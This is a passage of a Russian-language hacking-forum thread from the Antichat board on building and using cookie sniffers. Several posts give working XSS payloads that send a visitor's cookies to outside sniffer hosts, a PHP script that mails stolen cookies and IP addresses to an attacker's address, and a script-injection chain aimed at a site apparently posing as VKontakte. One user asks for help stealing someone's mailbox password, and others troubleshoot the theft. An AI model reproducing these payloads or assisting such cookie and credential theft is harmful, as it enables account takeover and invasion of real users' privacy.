ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 31.12.2005, 10:21
Аватар для byte57
byte57
Постоянный
Регистрация: 22.01.2005
Сообщений: 764
Провел на форуме:
1086047

Репутация: 67


По умолчанию

Цитата:
Сообщение от coco  
А можно ли вставить это
Код HTML:
http://s.netsec.ru//s.gif?id=561
в
Код HTML:
[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
получишь
Код HTML:
[email]gh0st@gh0st[url=http://gh0st.gov`=`][/url].gov[/email] ` style=`background:url(javascript:document.images[1].src="http://s.netsec.ru/your_login/pic.gif?"+document.cookie);`
регай себе PS - personal sniffer и там свой логин (your_login) указывай, впрочем там тебе твой линк на картинку дадут...
на всякий лучай скажу, что бага не везде работает, так что не думай, что щас все должно ломаться...

Последний раз редактировалось .::Gh0st::.; 31.12.2005 в 10:25..
 
Ответить с цитированием

  #32  
Старый 14.01.2006, 16:22
Аватар для MashuK
MashuK
Новичок
Регистрация: 29.12.2005
Сообщений: 11
Провел на форуме:
25965

Репутация: 3
Отправить сообщение для MashuK с помощью ICQ
Exclamation

.::Gh0st::.

зафигачила скрипт в инет (хост поддерживает пхп)
отправила ссылку на сайт на мыло. пришел только id текущей сессии, но это мне врядли поможет... ибо мне нужно узнать пароль от ящика, но который отправляется письмо. с остальными снифами та же трабла, шлет IP, ID, еще какую то хрень, но пасс не шлет. я вообщето, даже и на хэш пасса согласна , дешифровщиком тьма..
добавь пожалуйста в свой скрипт фунцию тырения пароля ))
---------------------
+ наставлю, не вапрос!
 
Ответить с цитированием

  #33  
Старый 15.01.2006, 22:17
Аватар для byte57
byte57
Постоянный
Регистрация: 22.01.2005
Сообщений: 764
Провел на форуме:
1086047

Репутация: 67


По умолчанию

суть в том, что нужно не просто ссылку заслать, а выполнить javascript в контексте уязвимого сайта и послать куки на свой скрипт. просто зайти поссылке - результата не даст.
 
Ответить с цитированием

  #34  
Старый 15.01.2006, 22:34
Аватар для •••™NO FEAR™•••
•••™NO FEAR™•••
Постоянный
Регистрация: 08.08.2005
Сообщений: 782
Провел на форуме:
6573706

Репутация: 1419


По умолчанию

Цитата:
еще какую то хрень
А чё за она?
Покажи что написанно.
 
Ответить с цитированием

  #35  
Старый 08.10.2009, 16:23
Аватар для pitter
pitter
Новичок
Регистрация: 02.10.2009
Сообщений: 10
Провел на форуме:
83128

Репутация: 0
По умолчанию

привет можете обьяснить не получаеться кое что

<?
$mymail = 'potter234@mail.ru';

$date = date('d.m.y - H:i:s');
$ip = UrlDecode(getenv('REMOTE_ADDR'));
$referer = UrlDecode(getenv('HTTP_REFERER'));
$query = UrlDecode(getenv('QUERY_STRING'));
$cookie=getenv('HTTP_COOKIE');

mail("$mymail", "Kyka npuIIIJIa", " Date and Time: $date\n IP: $ip\n Adress: $referer\n Query String: $query\n Cookie: $cookie");
?>

это скрипт

я пишу два скрипта

index.php
<script>document.location.href="уязвимост ь=%22%3E%3Cscript%20src=http://vkontaktes.h16.ru/js.js%3E%3C/script%3E"</script>
js.js
img=new Image(); img.src="http://vkontaktes.h16.ru/1.php"+document.cookie;

1.php- это для прихода куков на мыло
куки не идут на мыло и приходит токо айпи
 
Ответить с цитированием

  #36  
Старый 08.10.2009, 16:26
Аватар для hackmon
hackmon
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547

Репутация: 93
По умолчанию

кто скажет или снимет видео как на сайт установить сниффер?
 
Ответить с цитированием

  #37  
Старый 08.10.2009, 16:33
Аватар для pitter
pitter
Новичок
Регистрация: 02.10.2009
Сообщений: 10
Провел на форуме:
83128

Репутация: 0
По умолчанию

ты для начала исходники хорошие найди
 
Ответить с цитированием

  #38  
Старый 08.10.2009, 16:39
Аватар для pitter
pitter
Новичок
Регистрация: 02.10.2009
Сообщений: 10
Провел на форуме:
83128

Репутация: 0
По умолчанию

а то исходников много а есть и не рабочие!!!
 
Ответить с цитированием

  #39  
Старый 10.10.2009, 13:04
Аватар для _==wolf==_
_==wolf==_
Участник форума
Регистрация: 29.05.2008
Сообщений: 181
Провел на форуме:
979048

Репутация: 101
Отправить сообщение для _==wolf==_ с помощью ICQ
По умолчанию

Цитата:
а то исходников много а есть и |̳̿н̳̿е̳̿ ̳̿р̳̿а̳̿б̳̿о̳̿ч̳̿и̳̿е̳̿|!!!
например как твои исходники. ты сейвишь куки своего сайта а надо из query стринг так что убирай ваще то что $cookie=getenv('HTTP_COOKIE'); и тд. а вообще... за археологию банят
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Логи Сниффера Jonathan Allen Болталка 10 04.12.2005 20:47
Установка Web-сервера на локалхост KEZ Комментарии к видео 74 04.11.2005 23:05
развитие идеи сниффера. coyl PHP, PERL, MySQL, JavaScript 33 06.10.2005 20:12
Как оберечь сайт от сниффера? miggy PHP, PERL, MySQL, JavaScript 8 08.07.2005 04:59



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ